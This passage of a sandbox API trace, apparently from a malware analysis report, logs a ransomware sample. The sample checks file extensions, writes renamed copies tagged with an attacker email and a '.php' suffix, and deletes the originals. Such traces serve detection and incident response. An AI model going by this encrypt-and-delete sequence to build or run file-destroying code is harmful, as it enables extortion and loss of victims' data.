lpString2="dll") returned -1 [0055.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0055.898] lstrlenW (lpString=".dbf") returned 4 [0055.898] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0055.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0055.899] lstrlenW (lpString=".1cd") returned 4 [0055.899] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0055.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0055.899] lstrlenW (lpString=".jpg") returned 4 [0055.899] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0055.899] lstrcmpiW (lpString1=".CFG", lpString2=".php") returned -1 [0055.899] lstrlenW (lpString="CGMIMP32.CFG") returned 12 [0055.899] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0055.900] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x38bff1c | out: lpFileSize=0x38bff1c*=6811) returned 1 [0055.900] CloseHandle (hObject=0x218) returned 1 [0055.900] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg")) returned 0x20 [0055.900] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0055.900] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0055.900] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.900] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.900] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0055.901] GetLastError () returned 0x0 [0055.901] ReadFile (in: hFile=0x218, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0x1a9b, lpOverlapped=0x0) returned 1 [0055.911] WriteFile (in: hFile=0x1bc, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0x1aa0, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0x1aa0, lpOverlapped=0x0) returned 1 [0055.913] ReadFile (in: hFile=0x218, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0x0, lpOverlapped=0x0) returned 1 [0055.913] WriteFile (in: hFile=0x1bc, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.913] SetEndOfFile (hFile=0x1bc) returned 1 [0055.913] CloseHandle (hObject=0x1bc) returned 1 [0055.914] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.914] SetEndOfFile (hFile=0x218) returned 1 [0055.915] CloseHandle (hObject=0x218) returned 1 [0055.915] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0055.915] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg")) returned 1 [0055.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0055.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0055.916] lstrlenW (lpString=".doc") returned 4 [0055.916] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1 [0055.916] lstrlenW (lpString=".docx") returned 5 [0055.916] lstrcmpiW (lpString1=".docx", lpString2="2.CFG") returned -1 [0055.916] lstrlenW (lpString=".pdf") returned 4 [0055.916] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1 [0055.916] lstrlenW (lpString=".xls") returned 4 [0055.916] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1 [0055.916] lstrlenW (lpString=".xlsx") returned 5 [0055.916] lstrcmpiW (lpString1=".xlsx", lpString2="2.CFG") returned -1 [0055.916] lstrlenW (lpString=".ppt") returned 4 [0055.916] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1 [0055.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0055.916] lstrlenW (lpString=".zip") returned 4 [0055.916] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1 [0055.916] lstrlenW (lpString=".rar") returned 4 [0055.916] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1 [0055.916] lstrlenW (lpString=".bz2") returned 4 [0055.916] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1 [0055.916] lstrlenW (lpString=".7z") returned 3 [0055.916] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1 [0055.917] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0055.917] lstrlenW (lpString=".dbf") returned 4 [0055.917] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1 [0055.917] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0055.917] lstrlenW (lpString=".1cd") returned 4 [0055.917] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1 [0055.917] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0055.917] lstrlenW (lpString=".jpg") returned 4 [0055.917] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1 [0055.917] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0055.917] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0055.917] lstrlenW (lpString=".doc") returned 4 [0055.917] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1 [0055.917] lstrlenW (lpString=".docx") returned 5 [0055.917] lstrcmpiW (lpString1=".docx", lpString2="2.CFG") returned -1 [0055.917] lstrlenW (lpString=".pdf") returned 4 [0055.917] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1 [0055.917] lstrlenW (lpString=".xls") returned 4 [0055.917] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1 [0055.917] lstrlenW (lpString=".xlsx") returned 5 [0055.917] lstrcmpiW (lpString1=".xlsx", lpString2="2.CFG") returned -1 [0055.917] lstrlenW (lpString=".ppt") returned 4 [0055.917] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1 [0055.917] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0055.918] lstrlenW (lpString=".zip") returned 4 [0055.918] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1 [0055.918] lstrlenW (lpString=".rar") returned 4 [0055.918] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1 [0055.918] lstrlenW (lpString=".bz2") returned 4 [0055.918] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1 [0055.918] lstrlenW (lpString=".7z") returned 3 [0055.918] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1 [0055.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0055.918] lstrlenW (lpString=".dbf") returned 4 [0055.918] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1 [0055.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0055.918] lstrlenW (lpString=".1cd") returned 4 [0055.918] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1 [0055.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0055.918] lstrlenW (lpString=".jpg") returned 4 [0055.918] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1 [0055.918] lstrcmpiW (lpString1=".FLT", lpString2=".php") returned -1 [0055.918] lstrlenW (lpString="CGMIMP32.FLT") returned 12 [0055.919] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0055.927] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x38bff1c | out: lpFileSize=0x38bff1c*=323936) returned 1 [0055.927] CloseHandle (hObject=0x218) returned 1 [0055.927] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt")) returned 0x20 [0055.927] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0055.927] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0055.927] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.927] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.927] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0055.928] GetLastError () returned 0x0 [0055.928] ReadFile (in: hFile=0x218, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0x4f160, lpOverlapped=0x0) returned 1 [0055.938] WriteFile (in: hFile=0x1bc, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0x4f170, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0x4f170, lpOverlapped=0x0) returned 1 [0056.095] ReadFile (in: hFile=0x218, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0x0, lpOverlapped=0x0) returned 1 [0056.095] WriteFile (in: hFile=0x1bc, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.095] SetEndOfFile (hFile=0x1bc) returned 1 [0056.452] CloseHandle (hObject=0x1bc) returned 1 [0056.453] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.453] SetEndOfFile (hFile=0x218) returned 1 [0056.456] CloseHandle (hObject=0x218) returned 1 [0056.456] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.456] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt")) returned 1 [0057.107] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0057.107] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0057.107] lstrlenW (lpString=".doc") returned 4 [0057.107] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0057.107] lstrlenW (lpString=".docx") returned 5 [0057.107] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0057.107] lstrlenW (lpString=".pdf") returned 4 [0057.107] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0057.107] lstrlenW (lpString=".xls") returned 4 [0057.107] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0057.107] lstrlenW (lpString=".xlsx") returned 5 [0057.108] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0057.108] lstrlenW (lpString=".ppt") returned 4 [0057.108] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0057.108] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0057.108] lstrlenW (lpString=".zip") returned 4 [0057.108] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0057.108] lstrlenW (lpString=".rar") returned 4 [0057.108] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0057.108] lstrlenW (lpString=".bz2") returned 4 [0057.108] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0057.108] lstrlenW (lpString=".7z") returned 3 [0057.108] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0057.108] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0057.108] lstrlenW (lpString=".dbf") returned 4 [0057.108] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0057.108] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0057.108] lstrlenW (lpString=".1cd") returned 4 [0057.108] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0057.108] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0057.108] lstrlenW (lpString=".jpg") returned 4 [0057.108] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0057.108] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0057.108] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0057.108] lstrlenW (lpString=".doc") returned 4 [0057.108] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0057.108] lstrlenW (lpString=".docx") returned 5 [0057.108] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0057.108] lstrlenW (lpString=".pdf") returned 4 [0057.108] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0057.108] lstrlenW (lpString=".xls") returned 4 [0057.108] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0057.109] lstrlenW (lpString=".xlsx") returned 5 [0057.109] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0057.109] lstrlenW (lpString=".ppt") returned 4 [0057.109] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0057.109] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0057.109] lstrlenW (lpString=".zip") returned 4 [0057.109] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0057.109] lstrlenW (lpString=".rar") returned 4 [0057.109] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0057.109] lstrlenW (lpString=".bz2") returned 4 [0057.109] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0057.109] lstrlenW (lpString=".7z") returned 3 [0057.109] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0057.109] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0057.109] lstrlenW (lpString=".dbf") returned 4 [0057.109] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0057.109] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0057.109] lstrlenW (lpString=".1cd") returned 4 [0057.109] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0057.109] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0057.109] lstrlenW (lpString=".jpg") returned 4 [0057.109] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0057.110] lstrcmpiW (lpString1=".FLT", lpString2=".php") returned -1 [0057.110] lstrlenW (lpString="PNG32.FLT") returned 9 [0057.110] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 18 os_tid = 0x9c0 [0034.896] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10000) returned 0x2f110c0 [0034.896] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10000) returned 0x41d0048 [0034.897] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba8098 [0034.897] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x6) returned 0xbf8d68 [0034.897] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba80b0 [0034.897] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x100000) returned 0x43d0020 [0034.897] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba80c8 [0034.897] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xba80c8, Size=0x20) returned 0xb902c0 [0034.897] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba80c8 [0034.897] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xba80c8, Size=0x20) returned 0xb90270 [0034.897] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0034.897] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0034.897] Wow64DisableWow64FsRedirection (in: OldValue=0x3b0ff58 | out: OldValue=0x3b0ff58*=0x0) returned 1 [0034.897] lstrlenW (lpString="kernel32.dll") returned 12 [0034.898] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb902c0 | out: hHeap=0xb10000) returned 1 [0034.898] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0034.898] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb90270 | out: hHeap=0xb10000) returned 1 [0034.898] Sleep (dwMilliseconds=0x64) [0035.228] lstrlenW (lpString="BCD") returned 3 [0035.228] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.228] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0035.228] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0035.228] lstrlenW (lpString=".doc") returned 4 [0035.228] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0035.228] lstrlenW (lpString=".docx") returned 5 [0035.228] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0035.228] lstrlenW (lpString=".pdf") returned 4 [0035.228] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0035.228] lstrlenW (lpString=".xls") returned 4 [0035.228] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0035.228] lstrlenW (lpString=".xlsx") returned 5 [0035.228] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0035.228] lstrlenW (lpString=".ppt") returned 4 [0035.228] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0035.228] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0035.228] lstrlenW (lpString=".zip") returned 4 [0035.228] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0035.228] lstrlenW (lpString=".rar") returned 4 [0035.228] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0035.228] lstrlenW (lpString=".bz2") returned 4 [0035.228] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0035.228] lstrlenW (lpString=".7z") returned 3 [0035.228] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0035.228] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0035.228] lstrlenW (lpString=".dbf") returned 4 [0035.228] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0035.229] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0035.229] lstrlenW (lpString=".1cd") returned 4 [0035.229] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0035.229] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0035.229] lstrlenW (lpString=".jpg") returned 4 [0035.229] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0035.229] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0035.229] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0035.229] lstrlenW (lpString=".doc") returned 4 [0035.229] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0035.229] lstrlenW (lpString=".docx") returned 5 [0035.229] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0035.229] lstrlenW (lpString=".pdf") returned 4 [0035.229] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0035.229] lstrlenW (lpString=".xls") returned 4 [0035.229] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0035.229] lstrlenW (lpString=".xlsx") returned 5 [0035.229] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0035.229] lstrlenW (lpString=".ppt") returned 4 [0035.229] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0035.229] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0035.229] lstrlenW (lpString=".zip") returned 4 [0035.229] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0035.229] lstrlenW (lpString=".rar") returned 4 [0035.229] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0035.229] lstrlenW (lpString=".bz2") returned 4 [0035.229] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0035.229] lstrlenW (lpString=".7z") returned 3 [0035.229] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0035.229] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0035.229] lstrlenW (lpString=".dbf") returned 4 [0035.229] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0035.230] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0035.230] lstrlenW (lpString=".1cd") returned 4 [0035.230] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0035.230] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0035.230] lstrlenW (lpString=".jpg") returned 4 [0035.230] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0035.230] lstrcmpiW (lpString1=".LOG1", lpString2=".php") returned -1 [0035.230] lstrlenW (lpString="BCD.LOG1") returned 8 [0035.230] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.230] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x3b0ff1c | out: lpFileSize=0x3b0ff1c*=0) returned 1 [0035.230] CloseHandle (hObject=0x1a4) returned 1 [0035.230] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0035.230] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0035.230] lstrlenW (lpString=".doc") returned 4 [0035.230] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0035.230] lstrlenW (lpString=".docx") returned 5 [0035.230] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0035.230] lstrlenW (lpString=".pdf") returned 4 [0035.231] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0035.231] lstrlenW (lpString=".xls") returned 4 [0035.231] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0035.231] lstrlenW (lpString=".xlsx") returned 5 [0035.231] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0035.231] lstrlenW (lpString=".ppt") returned 4 [0035.231] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0035.231] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0035.231] lstrlenW (lpString=".zip") returned 4 [0035.231] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0035.231] lstrlenW (lpString=".rar") returned 4 [0035.231] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0035.231] lstrlenW (lpString=".bz2") returned 4 [0035.231] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0035.231] lstrlenW (lpString=".7z") returned 3 [0035.231] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0035.231] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0035.231] lstrlenW (lpString=".dbf") returned 4 [0035.231] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0035.231] lstrlenW 